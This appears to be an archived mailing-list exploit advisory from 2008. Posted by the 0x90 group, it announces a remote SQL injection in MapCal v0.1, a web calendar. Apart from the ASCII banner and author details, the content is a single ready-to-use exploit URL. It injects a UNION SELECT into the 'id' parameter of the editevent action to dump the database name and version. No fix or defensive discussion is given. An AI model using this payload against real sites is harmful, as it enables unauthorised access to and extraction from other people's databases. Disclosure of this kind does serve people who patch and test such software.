MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

Guns Mon, 22 Sep 2008 09:54:17 -0700

       _____          ____   _____

      /  _  \ /\  /\ / _  \ /  _  \


      | | | | \ \/ / ||_| | | | | |  

      | | | |  \  /  \_   | | | | |  

      | |_| |  /  \   __\ | | |_| |

      \_____/ / /\ \ |____/ \_____/

              \/  \/



[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection



[~] Author: 0x90



[~] HomePage: www.0x90.com.ar



[~] Contact: Guns[at]0x90[dot]com[dot]ar



[~] Script: MapCal - The Mapping Calendar



[~] site: http://mapcal.sourceforge.net



[~] Vulnerability Class: SQL Injection







[~] Exploit:



http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events

MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

Reply via email to